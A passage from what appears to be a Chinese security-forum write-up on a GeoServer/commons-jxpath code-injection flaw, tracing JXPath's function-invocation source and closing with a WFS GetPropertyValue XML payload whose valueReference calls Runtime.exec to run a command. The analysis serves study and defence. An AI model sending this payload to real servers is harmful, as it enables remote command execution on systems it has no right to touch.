s5+vKbDN7yGWa2/O+k4yO7TrL+2d9TPWhl8PnfYH7gKZImiMllxubYxzMO0ZrySeaNU5Rcz/jEysvOYztoTfkE8ySJusZzVBQXReg0fm6NteuvHs4kR/Mux9u+zdzCcdNvmFA3Q+Y7+MLHv8DKChNy+WPcM/tXvN7UBSTF6Ch4P3FDZppk2cXeH3yUv9k+RNHsGWiO/huf+MabdMsysuyk+h8f4m+2DVE4exYJNT/mU198iZagDEPn2fSTH/Cvv6shsSCNpmc/zZc+/x3+55SKgsIg2771OL86HRxu91//wt/8xy5Us+ZRHNjJtz/6PaqdYRm/3kf3iDYdVP9sMxeCYMqtoihFIqWgitlFKShkJ+/+08f5uz1+iudVYaz5Nz75f/9EjywjKSpY+7DEG++cH5HUvW0D9Q+sY6kWZM8JfvLoZ3ihScfMOSX0b/wLvvBc09XOiKGPLLuijo+3mn+/Zx2/PBJCKruHx5dlXV3xdtZyMnM5C9OG/5QkFfOX3Myx2obhv5XzePK/v84yQ/ik5azhjG0B5VO89VMVFCK/8tc8fcyDHGzl5b/7EbbsUjJzZ8ft18sx/sf/fpdQbhHaUz/jk3/16nBu+E/y0098g53MYkGpzO5/eJJfnfGO8mE8+TOe7JjEiFFMfWPk+dhcUw7VTb8N9j1sbriLj1QNH9b2nd/jo3/xKva0Sioy2/nNZ7/Ia+0ysjzIiVf/hZ/88GfsdGUyb1YGfbu+x2Pf2YEvfy4VCQf4t6/8NT+s7kAdIV6Whzj980/wmV+cJJg7h1mKPXz3889QL8vIsoeTf/wBv/p//8H6tkRKZug5/q+P8L2tjpj9AJwH/h+Pf/0V7GnlzEqp45ef+CqvXQJZdnOhsZlL215ms9VEflonf/zy5/l9/bA+roP/zmf+6hXslkrmZLbzzKe+yuvdV/slmvx4fPSLn/2OA/4M0rtf40tf+QLf/9kuhtLykQ//M0/94hDB0EBc7UKyPPFYP/4V23rN5Bob+d2n/4rXuoYft579xSf5y/VO8ubPwXD03/jcL47gHTXjPcjJP/6E0/06JCmJdN8uvv/7fXjlIO1//Db/fKaQqhzf1OKjMFOQ6KVl0S3cOXsOucaBmDGJ1Ckyx+aWGTn16n9xuv/qqdXrG5/BGHYPcuLVYb8N51ovM4stMXNrvGNHKYUIBBRMNEElKefz1C+e5i9XDM8C+5u2suVMKrcsmhG7o+B9xY2ZaWp5lZ8cWsuP3vocZUoJ+bYFlG9qZsgPdLzKT/60gu8d+hxLlBLy7RUMfnQNzx18lO+XA84s7vnGX/BAqsRdioNU/XYOP/7aI2QjY6l7jR+fvgR5gLWXhZ/7Ph+bLSHLK0lsns//vPkVVtwbXa2UsluoylHTVLmCW2ZrkFt+w0/23M4/bnuC2UoJeWU6bau+y8aWe/hsIZSu/RiJn/kTNV+dRYXUxbY3W3j4bxejkiRk7Ww+/8ImNJZUdJLEbYkneO7pw9g/W0JqvH5q/WPU8Z8oWMU/7NuDMi1GndtroyutdNQ9iybFgqrbTr8sY4ycMQi288bf/jsDX32OpRNmwXF+/uSDvKK5/PcyvvHyt7hZPYMnfvAAj37/txz41Fn+OPMfeGmpHqMUv1+fMAE2M6u+8S0ezZKQb1FwatFWT
<p>会在commons-jxpath:commons-jxpath进行解析对我们的输入进行恶意的调用</p>
<p>一路回到</p>
<div class=highlight><pre><span></span><span class=x>public Object computeValue(EvalContext context) {</span>
<span class=x> Object[] parameters = null;</span>
<span class=x> if (args != null) {</span>
<span class=x> parameters = new Object[args.length];</span>
<span class=x> for (int i = 0; i &lt; args.length; i++) {</span>
<span class=x> parameters[i] = convert(args[i].compute(context));</span>
<span class=x> }</span>
<span class=x> }</span>
<span class=x> Function function =</span>
<span class=x> context.getRootContext().getFunction(functionName, parameters);</span>
<span class=x> if (function == null) {</span>
<span class=x> throw new JXPathFunctionNotFoundException("No such function: "</span>
<span class=x> + functionName + Arrays.asList(parameters));</span>
<span class=x> }</span>
<span class=x> Object result = function.invoke(context, parameters);</span>
<span class=x> return result instanceof NodeSet ? new NodeSetContext(context,</span>
<span class=x> (NodeSet) result) : result;</span>
<span class=x>}</span>
</pre></div>
<p>重点会function.invoke(context, parameters)</p>
<p>调用invoke方法</p>
<div class=highlight><pre><span></span><span class=x>public Object invoke(ExpressionContext context, Object[] parameters) {</span>
<span class=x> try {</span>
<span class=x> Object target;</span>
<span class=x> Object[] args;</span>
<span class=x> if (Modifier.isStatic(method.getModifiers())) {</span>
<span class=x> target = null;</span>
<span class=x> if (parameters == null) {</span>
<span class=x> parameters = EMPTY_ARRAY;</span>
<span class=x> }</span>
<span class=x> int pi = 0;</span>
<span class=x> Class[] types = method.getParameterTypes();</span>
<span class=x> if (types.length &gt;= 1</span>
<span class=x> &amp;&amp; ExpressionContext.class.isAssignableFrom(types[0])) {</span>
<span class=x> pi = 1;</span>
<span class=x> }</span>
<span class=x> args = new Object[parameters.length + pi];</span>
<span class=x> if (pi == 1) {</span>
<span class=x> args[0] = context;</span>
<span class=x> }</span>
<span class=x> for (int i = 0; i &lt; parameters.length; i++) {</span>
<span class=x> args[i + pi] =</span>
<span class=x> TypeUtils.convert(parameters[i], types[i + pi]);</span>
<span class=x> }</span>
<span class=x> }</span>
<span class=x> else {</span>
<span class=x> int pi = 0;</span>
<span class=x> Class[] types = method.getParameterTypes();</span>
<span class=x> if (types.length &gt;= 1</span>
<span class=x> &amp;&amp; ExpressionContext.class.isAssignableFrom(types[0])) {</span>
<span class=x> pi = 1;</span>
<span class=x> }</span>
<span class=x> target =</span>
<span class=x> TypeUtils.convert(</span>
<span class=x> parameters[0],</span>
<span class=x> method.getDeclaringClass());</span>
<span class=x> args = new Object[parameters.length - 1 + pi];</span>
<span class=x> if (pi == 1) {</span>
<span class=x> args[0] = context;</span>
<span class=x> }</span>
<span class=x> for (int i = 1; i &lt; parameters.length; i++) {</span>
<span class=x> args[pi + i - 1] =</span>
<span class=x> TypeUtils.convert(parameters[i], types[i + pi - 1]);</span>
<span class=x> }</span>
<span class=x> }</span>
<span class=x> return method.invoke(target, args);</span>
<span class=x> }</span>
<span class=x> catch (Throwable ex) {</span>
<span class=x> if (ex instanceof InvocationTargetException) {</span>
<span class=x> ex = ((InvocationTargetException) ex).getTargetException();</span>
<span class=x> }</span>
<span class=x> throw new JXPathInvalidAccessException("Cannot invoke " + method,</span>
<span class=x> ex);</span>
<span class=x> }</span>
<span class=x>}</span>
</pre></div>
<p>判断我们的方法类型后调用方法对应的invoke方法</p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202031-64802dea-7a6f-1.png title><img src="data:image/png;base64,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
<p>这个是当时我在windwos环境的图</p>
<p>最后再来解释一下paylaod</p>
<div class=highlight><pre><span></span><span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span> <span class=n>service</span><span class=o>=</span><span class=err>'</span><span class=n>WFS</span><span class=err>'</span> <span class=n>version</span><span class=o>=</span><span class=err>'</span><span class=mf>2.0.0</span><span class=err>'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>topp</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.openplans.org/topp'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>fes</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/fes/2.0'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>wfs</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/wfs/2.0'&gt;</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>Query</span> <span class=n>typeNames</span><span class=o>=</span><span class=err>'</span><span class=n>sf</span><span class=o>:</span><span class=n>archsites</span><span class=err>'</span><span class=o>/&gt;</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span><span class=n>exec</span><span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>lang</span><span class=o>.</span><span class=na>Runtime</span><span class=o>.</span><span class=na>getRuntime</span><span class=o>(),</span><span class=err>'</span><span class=n>touch</span> <span class=o>/</span><span class=n>tmp</span><span class=o>/</span><span class=n>success</span><span class=err>'</span><span class=o>)&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span>
<span class=o>&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span><span class=o>&gt;</span>
</pre></div>
<p><code>typeNames</code> 属性指定了要查询的要素类型</p>
<p><code>valueReference</code> 元素指定了需要提取的具体属性路径通常是一个xpath表达式</p>
</div>
<div class=post-user-action style=margin-top:34px>
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15704>
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
</span>
<span class="btn btn-default pull-right" id=follow_topic data-pk=15704>
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
</span>
<span class="btn btn-default pull-right">
<span>
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
</span>
</span>
<div class=clearfix></div>
</div>
<div class=related-section>
<div class=related-box>
<span><a class=pull-left href=https://xz.aliyun.com/t/15703 title=孔夫子APT组织最新攻击样本详细分析><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>孔夫子APT组织最新攻击样本详细分析</a></span>
<span><a class=pull-left href=https://xz.aliyun.com/t/15705 title=Sharp4VerifyNative通过白名单文件执行.NET反序列化代码绕过防护><span class=related-label>下一篇:</span>Sharp4VerifyNativ...</a></span>
</div>
</div>
</div>
</div>
</div>
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
<div class=modal-dialog>
<div class=modal-content>
<div class=modal-header>
<h4 class=modal-title id=myModalLabel style=text-align:center>
积分打赏
</h4>
</div>
<div class=modal-body id=button-value>
<div style=text-align:center>
<div role=group>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
1分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
2分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
5分
</button>
</div>
<br>
<div style=margin-top:20px>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
8分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
10分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
20分
</button>
</div>
</div>
</div>
<div class=modal-footer id=confirm>
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
<button type=button class="btn btn-primary" id=reward_topic data-pk=15704>确定</button>
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>0 条回复</li>
</ol>
<div class="box-container post-container">
<ul>
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
</ul>
</div>
</div>
<div class="row box" id=reply-box>
<div class="box-container clearfix">
<div class=reminder>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15704&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
</div>
</div>
</div>
<footer class=bs-docs-footer>
<div class="container text-center">
<div class=links>
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
<a href=https://xz.aliyun.com/connection>联系我们</a>
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
</div>
</div>
</footer>
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
Reference in New Issue Copy Permalink